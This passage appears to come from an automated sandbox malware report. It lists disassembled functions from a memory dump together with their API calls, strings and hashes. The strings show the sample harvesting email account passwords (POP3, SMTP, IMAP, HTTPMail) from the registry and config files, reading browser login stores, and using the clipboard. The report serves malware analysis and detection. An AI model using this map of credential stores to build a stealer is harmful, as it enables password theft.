                                                                                                                                                                                                                        • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                                                                                        • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00402EBC
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00402ECF
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00402F5C
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00402F69
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402FC3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                                                      • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                                                      • API String ID: 52435246-1534328989
                                                                                                                                                                                                                      • Opcode ID: 8606da5831358c67b4a99ee8b6ad117f72868ee6eb846870c269daa592ef00d8
                                                                                                                                                                                                                      • Instruction ID: 400a04a5c8efacb9c4641a70875855bf6b7e4888715d32951425251a7c23a99d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8606da5831358c67b4a99ee8b6ad117f72868ee6eb846870c269daa592ef00d8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 575130B1900118BBEF11EB51DD41FEE777CAF04754F5080A7BA0CA6192DBB89B858F98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406B9A Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00406BA4
                                                                                                                                                                                                                        • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00406BC1
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406BD2
                                                                                                                                                                                                                      • GlobalFix.KERNEL32(00000000), ref: 00406BDF
                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BF2
                                                                                                                                                                                                                      • GlobalUnWire.KERNEL32(00000000), ref: 00406C01
                                                                                                                                                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00406C0A
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00406C12
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406C1E
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00406C29
                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00406C32
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2565263379-0
                                                                                                                                                                                                                      • Opcode ID: 1b6e565173029c6444be00b6b2d36f782b825a097f2130a1a97e673a6d3a71af
                                                                                                                                                                                                                      • Instruction ID: 428d7c431cb1422a1915013c6704b220f4cf118cce9454ff27e0024ace88079b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b6e565173029c6444be00b6b2d36f782b825a097f2130a1a97e673a6d3a71af
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2114239904605FFEF105FA4DC4CB9E7FB8EB46755F104035F542E1192DB7489508A69
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406C3D Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00406C45
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406C52
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C0BB,?), ref: 00406C61
                                                                                                                                                                                                                      • GlobalFix.KERNEL32(00000000), ref: 00406C6E
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00406C77
                                                                                                                                                                                                                      • GlobalUnWire.KERNEL32(00000000), ref: 00406C80
                                                                                                                                                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00406C89
                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00406C99
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2315226746-0
                                                                                                                                                                                                                      • Opcode ID: ee3e5d8b8b8103545cd3f6b58303d98c31de17f75192de6e2f85eb2c234adac6
                                                                                                                                                                                                                      • Instruction ID: 8edcd2d2b4f986e571765b3eebb92d88a59871b3330cf63fe52768e208e874e1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee3e5d8b8b8103545cd3f6b58303d98c31de17f75192de6e2f85eb2c234adac6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23F0E93B5047186BD7102FA1BC4CE6BBB2CDB86F96B050039FA0AD6253DE755C0447B9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004033E2 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                                                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                                                      • API String ID: 3963849919-1658304561
                                                                                                                                                                                                                      • Opcode ID: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
                                                                                                                                                                                                                      • Instruction ID: 1b90a5eb0bf433dfd26fdc49de6d86aad9c02d214cf5b02dd481862667588e5e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF21F47180151C6EDB51EB11DD82FEE777C9B44705F4004ABBA09B1092DBBC6BC68E59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004016FC Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                      • String ID: E$ E$ E
                                                                                                                                                                                                                      • API String ID: 1865533344-1090515111
                                                                                                                                                                                                                      • Opcode ID: 9da058ee93427dafffafa38840fabb32167184d36f2f077627326be0874b02b0
                                                                                                                                                                                                                      • Instruction ID: 87a0be596659d04b7e64c8373dbe8b7d58709088cb568d7826d55e868489c559
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9da058ee93427dafffafa38840fabb32167184d36f2f077627326be0874b02b0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E115A74900209EFCF119F90C905AAE3BB1AF08312F00806AFC156B2A2C7799911DFAA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0044227B Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0044269A
                                                                                                                                                                                                                      • _strncoll.MSVCRT ref: 004426AA
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00442726
                                                                                                                                                                                                                      • atoi.MSVCRT ref: 00442737
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00442763
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                                                                                                                                                                                                      • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                                                      • API String ID: 1864335961-3210201812
                                                                                                                                                                                                                      • Opcode ID: 80ec9a29ea78ec2cbe9852ea9064bf10950e9091ede64f5a1b804a11a303e8fe
                                                                                                                                                                                                                      • Instruction ID: 53082eb74af2b51306e1b07bdc149dea26fd0daa9c3b29582cc647e8b6ddbc01
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80ec9a29ea78ec2cbe9852ea9064bf10950e9091ede64f5a1b804a11a303e8fe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90F112B080625CDBFB61CF54D9897DEBBB0EB01308F5881CAD4597B251C7B81A89CF99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0044315E Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                                                      • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                                                      • API String ID: 1714764973-479759155
                                                                                                                                                                                                                      • Opcode ID: a22eaacac348120a4584acb678e178257747be7cf0bf62b2cbe4dd5676c6cf3b
                                                                                                                                                                                                                      • Instruction ID: 5e0940cb4a553810ccd5eed58eee7b2aa7af7a3cc246567a3fd24b3687d2e464
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a22eaacac348120a4584acb678e178257747be7cf0bf62b2cbe4dd5676c6cf3b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD9191B260C7049AF628BB329D43B9B33D8AF50719F10043FF95AB61C2EE6DB905465D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040E417 Relevance: 68.7, APIs: 25, Strings: 14, Instructions: 449COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E6BB
                                                                                                                                                                                                                        • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                                                        • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                                                        • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E70C
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E728
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,%@,000000FF,?,00000104,?,?,?,?,?,?,0040EC25,?,00000000), ref: 0040E73F
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040EC25,?), ref: 0040E75E
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E7C0
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E7D5
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E83A
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E850
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E866
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E87C
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E892
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E8A8
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E8C2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                                      • String ID: $"$$$$$%@$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                                      • API String ID: 3137614212-1813914204
                                                                                                                                                                                                                      • Opcode ID: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                                                                                                                                                                                                      • Instruction ID: 60cbd65c12865ccb94f157c96bc1922d811664869268201cbad442dfa9876f55
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9228E218087DA9DDB31D6BC9C456CDBF646B16234F0803DAF1E8BB2D2D7344A46CB66
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040DA89 Relevance: 61.5, APIs: 21, Strings: 14, Instructions: 232stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi$strlen$_strncoll$atoimemset$memcpy
                                                                                                                                                                                                                      • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                                                                                                                                                      • API String ID: 594115653-593045482
                                                                                                                                                                                                                      • Opcode ID: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                                                                                                                                                                                                      • Instruction ID: 1e907043fac54bf2e371806c1eb24ba38ca233ac5dd260cadef0f6990961d541
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C71D832804204AEFF14ABA1DD02B9E77B5DF91329F21406FF545B21C1EB7D9A18D64C
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040E070 Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 279COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                                                        • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                                                        • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                                                        • Part of subcall function 004086A5: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                                                                                        • Part of subcall function 004086A5: CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                                                                                        • Part of subcall function 00408763: _mbsicmp.MSVCRT ref: 0040879D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E123
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E138
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E19F
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E1B5
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E1CB
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E1E1
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E1F7
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040E20A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E225
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E23C
                                                                                                                                                                                                                        • Part of subcall function 00406582: memset.MSVCRT ref: 004065A3
                                                                                                                                                                                                                        • Part of subcall function 00406582: memcmp.MSVCRT ref: 004065CD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E29D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E2B4
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E2CB
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E2E6
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E2FB
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E310
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E326
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E33F
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E358
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E374
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                                                      • String ID: C@$encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                                                      • API String ID: 4171719235-3249434271
                                                                                                                                                                                                                      • Opcode ID: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
                                                                                                                                                                                                                      • Instruction ID: 4eb083177fa9c3dcba641838e0e399a852ec85db15ddf69852980c8670b79128
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EFA16672D04219AEDF10EBA1DC41ADE77BCAF44304F1044BFF645B7181DA38AA988F59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040FD76 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0040FDA3
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040FDAF
                                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 0040FDBE
                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 0040FDCA
                                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0040FDD3
                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0040FDDF
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0040FDF1
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040FDFC
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE10
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE1E
                                                                                                                                                                                                                      • GetDC.USER32 ref: 0040FE57
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040FE97
                                                                                                                                                                                                                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040FEA8
                                                                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 0040FEF5
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040FFB5
                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 0040FFC9
                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 0040FFE7
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 0041001D
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041002D
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041003B
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00410052
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041005C
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 004100A2
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004100AC
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 004100E4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                      • API String ID: 1703216249-3046471546
                                                                                                                                                                                                                      • Opcode ID: 8a60e0ba97f171743a829e93ce0ff1a0e7cc565a63bc43af7584db32dade8b22
                                                                                                                                                                                                                      • Instruction ID: 60093129ffb9b10d71bc98ba01756b195f92c815bd96d79b3314cc8c80e42073
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a60e0ba97f171743a829e93ce0ff1a0e7cc565a63bc43af7584db32dade8b22
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62B1DE71108741AFDB20DF68C985E6BBBE9FF88704F00492EF69992261DB75E804CF56
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040243C Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004024E7
                                                                                                                                                                                                                        • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00402525
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 004025EF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                                                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                                                      • API String ID: 168965057-606283353
                                                                                                                                                                                                                      • Opcode ID: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
                                                                                                                                                                                                                      • Instruction ID: 01ace8319ffdb9fe87aab8cc910760b0be55d28e69d7af66dfccc1b3ad16f9ad
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 815163B540161CEBEF20DF91DC85ADD7BACAF04318F50846BFA08A6142D7BD9584CF98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004027B0 Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040285B
                                                                                                                                                                                                                        • Part of subcall function 00402994: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029C5
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00402895
                                                                                                                                                                                                                        • Part of subcall function 00402994: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029F3
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040296D
